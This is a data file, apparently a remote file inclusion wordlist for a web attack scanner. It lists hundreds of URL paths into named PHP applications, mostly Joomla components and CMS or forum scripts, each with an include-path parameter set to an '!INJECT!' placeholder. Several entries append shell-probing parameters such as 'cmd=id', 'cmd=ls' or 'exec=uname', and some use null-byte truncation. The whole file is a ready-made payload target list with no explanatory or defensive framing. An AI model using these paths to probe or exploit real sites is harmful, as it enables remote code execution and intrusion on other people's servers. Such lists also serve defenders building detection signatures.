/admin/code/index.php?load_page=!INJECT!
/admin/comment.php?config[installdir]=!INJECT!
/admin/common-menu.php?CONF[local_path]=!INJECT!
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
/admin/directory.php?config[installdir]=!INJECT!
/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
/admin/frontpage_right.php?loadadminpage=!INJECT!
/admin/header.php?loc=!INJECT!
/admin/inc/add.php?format_menue=!INJECT!
/admin/inc/change_action.php?format_menue=!INJECT!
/admin/include/common.php?commonIncludePath=!INJECT!?
/admin/include/header.php?repertoire=!INJECT!?
/admin/include/lib.module.php?mod_root=!INJECT!
/admin/includes/admin_header.php?level=!INJECT!?
/admin/includes/author_panel_header.php?level=!INJECT!?
/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/admin/index.php?path_to_script=!INJECT!?&cmd=ls
/admin/index.php?pg=!INJECT!?
/admin/index.php?xtrphome=!INJECT!
/admin/index_sitios.php?_VIEW=!INJECT!
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
/admin/login.php?absolute_path=!INJECT!
/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
/admin/news.php?language=!INJECT!
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
/admin/sendmsg.php?config[installdir]=!INJECT!
/admin/setup/level2.php?dir=!INJECT!
/admin/system/config/conf-activation.php?site_path=!INJECT!
/admin/system/include.php?skindir=!INJECT!
/admin/system/include.php?start=1&skindir=!INJECT!
/admin/system/menu/item.php?site_path=!INJECT!
/admin/system/modules/conf_modules.php?site_path=!INJECT!
/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
/admin/themes.php?config[installdir]=!INJECT!
/admin/tools/utf8conversion/index.php?path=!INJECT!?
/admin/user_user.php?language=!INJECT!
/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
/admincp/auth/secure.php?cfgProgDir=!INJECT!
/adminhead.php?path[docroot]=!INJECT!
/admini/admin.php?INC=!INJECT!?
/admini/index.php?INC=!INJECT!?
/administrator/admin.php?site_absolute_path=!INJECT!?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
/administrator/menu_add.php?site_absolute_path=!INJECT!?
/administrator/menu_operation.php?site_absolute_path=!INJECT!?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
/adodb/adodb.inc.php?path=!INJECT!
/advanced_comment_system/admin.php?ACS_path=!INJECT!?
/advanced_comment_system/index.php?ACS_path=!INJECT!?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
/agenda.php3?rootagenda=!INJECT!
/agenda2.php3?rootagenda=!INJECT!
/aides/index.php?page=!INJECT!?
/ains_main.php?ains_path=!INJECT!
/ajax/loadsplash.php?full_path=!INJECT!
/ajouter.php?include=!INJECT!?
/akarru.gui/main_content.php?bm_content=!INJECT!
/akocomments.php?mosConfig_absolute_path=!INJECT!
/amazon/cart.php?cmd=add&asin=!INJECT!
/amazon/index.php?lang=!INJECT!
/amazon/info.php?asin=!INJECT!
/annonce.php?page=!INJECT!?&cmd=id
/announcements.php?phpraid_dir=!INJECT!
/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
/api.php?t_path_core=!INJECT!?&cmd=id
/apps/apps.php?app=!INJECT!
/appserv/main.php?appserv_root=!INJECT!
/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
/archive.php?scriptpath=!INJECT!?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
/artlist.php?root_path=!INJECT!
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/athena.php?athena_dir=!INJECT!
/auction/auction_common.php?phpbb_root_path=!INJECT!
/auction/includes/converter.inc.php?include_path=!INJECT!?
/auction/includes/messages.inc.php?include_path=!INJECT!?
/auction/includes/settings.inc.php?include_path=!INJECT!?
/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
/auth.cookie.inc.php?da_path=!INJECT!
/auth.header.inc.php?da_path=!INJECT!
/auth.sessions.inc.php?da_path=!INJECT!
/auth/auth.php?phpbb_root_path=!INJECT!
/auth/auth_phpbb/phpbb_root_path=!INJECT!
/authenticate.php?default_path_for_themes=!INJECT!?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
/autoindex.php?cfg_file=!INJECT!?
/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
/axoverzicht.cgi?maand=!INJECT!
/b2-tools/gm-2-b2.php?b2inc=!INJECT!
/b2verifauth.php?index=!INJECT!?
/backend/addons/links/index.php?PATH=!INJECT!
/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
/bb_admin.php?includeFooter=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!
/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
/bemarket/postscript/postscript.php?p_mode=!INJECT!
/biblioteca/bib_form.php?CLASSPATH=!INJECT!
/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
/biblioteca/bib_save.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
/biblioteca/edi_form.php?CLASSPATH=!INJECT!
/biblioteca/edi_save.php?CLASSPATH=!INJECT!
/biblioteca/gen_form.php?CLASSPATH=!INJECT!
/biblioteca/gen_save.php?CLASSPATH=!INJECT!
/biblioteca/lin_form.php?CLASSPATH=!INJECT!
/biblioteca/lin_save.php?CLASSPATH=!INJECT!
/biblioteca/luo_form.php?CLASSPATH=!INJECT!
/biblioteca/luo_save.php?CLASSPATH=!INJECT!
/biblioteca/sog_form.php?CLASSPATH=!INJECT!
/biblioteca/sog_save.php?CLASSPATH=!INJECT!
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
/bild.php?config[root_ordner]=!INJECT!?&cmd=id
/bin/qte_init.php?qte_root=!INJECT!?
/bingoserver.php3?response_dir=!INJECT!
/block.php?Include=!INJECT!
/blocks/birthday.php?full_path=!INJECT!
/blocks/events.php?full_path=!INJECT!
/blocks/help.php?full_path=!INJECT!
/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
/blogcms/index.php?DIR_PLUGINS=!INJECT!?
/board/post.php?qb_path=!INJECT!
/boitenews4/index.php?url_index=!INJECT!?
/books/allbooks.php?home=!INJECT!
/books/home.php?home=!INJECT!
/books/mybooks.php?home=!INJECT!
/bp_ncom.php?bnrep=!INJECT!
/bp_ncom.php?bnrep=!INJECT!?
/bp_news.php?bnrep=!INJECT!
/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
/bridge/yabbse.inc.php?sourcedir=!INJECT!
/bridges/SMF/logout.php?path_to_smf=!INJECT!
/bu/bu_cache.php?bu_dir=!INJECT!?
/bu/bu_claro.php?bu_dir=!INJECT!?
/bu/bu_parse.php?bu_dir=!INJECT!?
/bu/process.php?bu_dir=!INJECT!?
/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/builddb.php?env_dir=!INJECT!
/button/settings_sql.php?path=!INJECT!
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
/cal.func.php?dir_edge_lang=!INJECT!
/calcul-page.php?home=!INJECT!
/calendar.php?cfg_dir=!INJECT!?
/calendar.php?lang=!INJECT!
/calendar.php?path_to_calendar=!INJECT!
/calendar.php?vwar_root=!INJECT!?
/calendar/demo/index.php?date=&v=!INJECT!?
/calendar/payment.php?insPath=!INJECT!
/calendario/cal_insert.php?CLASSPATH=!INJECT!
/calendario/cal_save.php?CLASSPATH=!INJECT!
/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
/cart.php?lang_list=!INJECT!
/cart_content.php?cart_isp_root=!INJECT!
/catalogg/inludes/include_once.php?include_file=!INJECT!
/catalogshop.php?mosConfig_absolute_path=!INJECT!
/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
/cfagcms/themes/default/index.php?main=!INJECT!
/ch_readalso.php?read_xml_include=!INJECT!
/challenge.php?vwar_root=!INJECT!
/change_preferences2.php?target=!INJECT!?
/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/chat.php?my[root]=!INJECT!?cm=id
/chat/adminips.php?banned_file=!INJECT!
/chat/users_popupL.php3?From=!INJECT!
/checkout.php?abs_path=!INJECT!
/checkout.php?abs_path=!INJECT!?
/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
/circ.php?include_path=!INJECT!?
/circolari/cir_save.php?CLASSPATH=!INJECT!
/citywriter/head.php?path=!INJECT!?
/cl_files/index.php?path_to_calendar=!INJECT!?
/claroline/auth/ldap/authldap.php?includePath=!INJECT!
/claroline/phpbb/page_tail.php?includePath=!INJECT!
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
/class.mysql.php?path_to_bt_dir=!INJECT!
/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
/classes/Cache.class.php?rootdir=!INJECT!?
/classes/Customer.class.php?rootdir=!INJECT!?
/classes/Performance.class.php?rootdir=!INJECT!?
/classes/Project.class.php?rootdir=!INJECT!?
/classes/Representative.class.php?rootdir=!INJECT!?
/classes/User.class.php?rootdir=!INJECT!?
/classes/admin_o.php?absolutepath=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!
/classes/adodbt/sql.php?classes_dir=!INJECT!?
/classes/board_o.php?absolutepath=!INJECT!
/classes/class_admin.php?PathToComment=!INJECT!?
/classes/class_comments.php?PathToComment=!INJECT!?
/classes/class_mail.inc.php?path_to_folder=!INJECT!
/classes/common.php?rootdir=!INJECT!?
/classes/core/language.php?rootdir=!INJECT!
/classes/dev_o.php?absolutepath=!INJECT!
/classes/file_o.php?absolutepath=!INJECT!
/classes/html/com_articles.php?absolute_path=!INJECT!
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
/classes/query.class.php?baseDir=!INJECT!
/classes/tech_o.php?absolutepath=!INJECT!
/classified.php?insPath=!INJECT!
/classified_right.php?language_dir=!INJECT!
/classifieds/index.php?lowerTemplate=!INJECT!
/clear.php?bibtexrootrel=!INJECT!?
/clearinfo.php?bibtexrootrel=!INJECT!?
/click.php?dir=!INJECT!?
/client.php?dir=!INJECT!
/client/faq_1/PageController.php?dir=!INJECT!
/clients/index.php?src=!INJECT!
/cls_fast_template.php?fname=!INJECT!
/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
/cms/meetweb/classes/modules.php?root_path=!INJECT!
/cms/modules/form.lib.php?sourceFolder=!INJECT!?
/cms/system/openengine.php?oe_classpath=!INJECT!???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
/cn_config.php?tpath=!INJECT!?
/coast/header.php?sections_file=!INJECT!?
/code/berylium-classes.php?beryliumroot=!INJECT!?
/code/display.php?admindir=!INJECT!?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
/comments.php?AMG_serverpath=!INJECT!
/comments.php?scriptpath=!INJECT!?
/common.inc.php?CFG[libdir]=!INJECT!
/common.inc.php?CFG[libdir]=!INJECT!?
/common.inc.php?base_path=!INJECT!
/common.php?db_file=!INJECT!
/common.php?dir=!INJECT!
/common.php?ezt_root_path=!INJECT!?
/common.php?include_path=!INJECT!
/common.php?livealbum_dir=!INJECT!?
/common.php?locale=!INJECT!
/common.php?phpht_real_path=!INJECT!?
/common/db.php?commonpath=!INJECT!?
/common/func.php?CommonAbsD=!INJECT!?
/common/func.php?CommonAbsDir=!INJECT!
/community/Offline.php?sourcedir=!INJECT!?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
/components/calendar/com_calendar.php?absolute_path=!INJECT!?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
/components/com_articles.php?absolute_path=!INJECT!?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
/components/com_calendar.php?absolute_path=!INJECT!?
/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
/components/com_forum/download.php?phpbb_root_path=!INJECT!
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
/components/com_guestbook.php?absolute_path=!INJECT!?
/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
/components/com_minibb.php?absolute_path=!INJECT!
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
/components/core/connect.php?language_path=!INJECT!
/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
/components/minibb/index.php?absolute_path=!INJECT!?
/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/compteur/mapage.php?chemin=!INJECT!
/conf.php?securelib=!INJECT!
/conf.php?securelib=!INJECT!?
/config.inc.php3?rel_path=!INJECT!
/config.inc.php?_path=!INJECT!
/config.inc.php?path_escape=!INJECT!
/config.inc.php?path_escape=!INJECT!%00
/config.php?full_path=!INJECT!?
/config.php?full_path_to_db=!INJECT!
/config.php?fullpath=!INJECT!
/config.php?incpath=!INJECT!
/config.php?path_to_root=!INJECT!
/config.php?rel_path=!INJECT!?
/config.php?returnpath=!INJECT!
/config.php?sql_language=!INJECT!?
/config.php?xcart_dir=!INJECT!?
/config/config_admin.php?INC=!INJECT!?
/config/config_main.php?INC=!INJECT!?
/config/config_member.php?INC=!INJECT!?
/config/dbutil.bck.php?confdir=!INJECT!
/config/mysql_config.php?INC=!INJECT!?
/config/sender.php?ROOT_PATH=!INJECT!?
/configuration.php?absolute_path=!INJECT!?
/confirmUnsubscription.php?output=!INJECT!
/connect.php?path=!INJECT!
/connexion.php?DOCUMENT_ROOT=!INJECT!?
/contact.php?blog_theme=!INJECT!
/contacts.php?cal_dir=!INJECT!
/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
/content.php?content=!INJECT!
/content/admin.php?pwfile=!INJECT!
/content/content.php?fileloc=!INJECT!?
/content/delete.php?pwfile=!INJECT!
/content/modify.php?pwfile=!INJECT!
/content/modify_go.php?pwfile=!INJECT!
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
/controllers/MySQLController.php?baseDir=!INJECT!
/controllers/SQLController.php?baseDir=!INJECT!
/controllers/SetupController.php?baseDir=!INJECT!
/controllers/VideoController.php?baseDir=!INJECT!
/controllers/ViewController.php?baseDir=!INJECT!
/convert-date.php?cal_dir=!INJECT!
/convert/mvcw.php?step=1&vwar_root=!INJECT!
/convert/mvcw.php?vwar_root=!INJECT!
/core/admin/admin.php?p=admin&absoluteurl!INJECT!
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
/core/admin/categories_add.php?absoluteurl!INJECT!
/core/admin/categories_remove.php?absoluteurl!INJECT!
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
/core/admin/login.php?absoluteurl!INJECT!
/core/admin/pgRSSnews.php?absoluteurl!INJECT!
/core/admin/showcat.php?absoluteurl!INJECT!
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
/core/archive_cat.php?absoluteurl!INJECT!
/core/archive_nocat.php?absoluteurl!INJECT!
/core/aural.php?site_absolute_path=!INJECT!
/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
/core/editor.php?editor_insert_bottom=!INJECT!
/core/includes.php?CMS_ROOT=!INJECT!?
/core/recent_list.php?absoluteurl!INJECT!
/corpo.php?pagina=!INJECT!
/cp2.php?securelib=!INJECT!?
/cpe/index.php?repertoire_config=!INJECT!
/crea.php?plancia=!INJECT!
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
